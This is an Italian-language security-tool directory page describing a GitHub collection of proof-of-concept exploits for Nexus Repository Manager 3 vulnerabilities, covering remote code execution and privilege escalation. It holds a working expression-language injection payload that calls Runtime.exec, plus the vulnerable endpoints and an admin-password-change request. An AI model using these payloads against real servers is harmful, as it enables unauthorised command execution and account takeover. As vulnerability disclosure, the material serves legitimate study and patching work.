Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-10199 — Collezione di exploit PoC per le vulnerabilità di Nexus Repository Manager 3 (CVE-2020-10199, CVE-2020-10204, CVE-2020-11444) che consentono l'esecuzione remota di codice e l'escalation dei privilegi tramite endpoint HTTP. | Kitploit
Strumenti/GitHubGitHub/jas502n/cve-2020-10199
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubjas502n/cve-2020-10199

CVE-2020-10199

Collezione di exploit PoC per le vulnerabilità di Nexus Repository Manager 3 (CVE-2020-10199, CVE-2020-10204, CVE-2020-11444) che consentono l'esecuzione remota di codice e l'escalation dei privilegi tramite endpoint HTTP.

Vedi Repository
35926 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Nexus Repository Manager 3 Vuln (versioni interessate: <= 3.21.2)

CVE-2020-10199, CVE-2020-10204, CVE-2020-11444

CVE-2020-10199 Esecuzione remota di comandi

POC con output

POC senza output

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

Privilegi utente normale

root@kitploit:~
/service/rest/beta/repositories/go/group

Richiede privilegi di amministratore

  1. Creare CleanupPolicy

/service/extdirect

  1. Creare repositories

/service/rest/beta/repositories/apt/hosted

CVE-2020-10204 Esecuzione remota di comandi

  1. Sfruttare l'interfaccia di aggiornamento utente /service/extdirect
  2. Sfruttare l'interfaccia di creazione ruolo /service/extdirect

CVE-2020-11444 Vulnerabilità di escalation dei privilegi

Chiamare l'interfaccia di aggiornamento ruolo

root@kitploit:~
/service/rest/beta/security/users/admin/change-password

POST:
123456

Link di riferimento

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus

Scarica lo strumento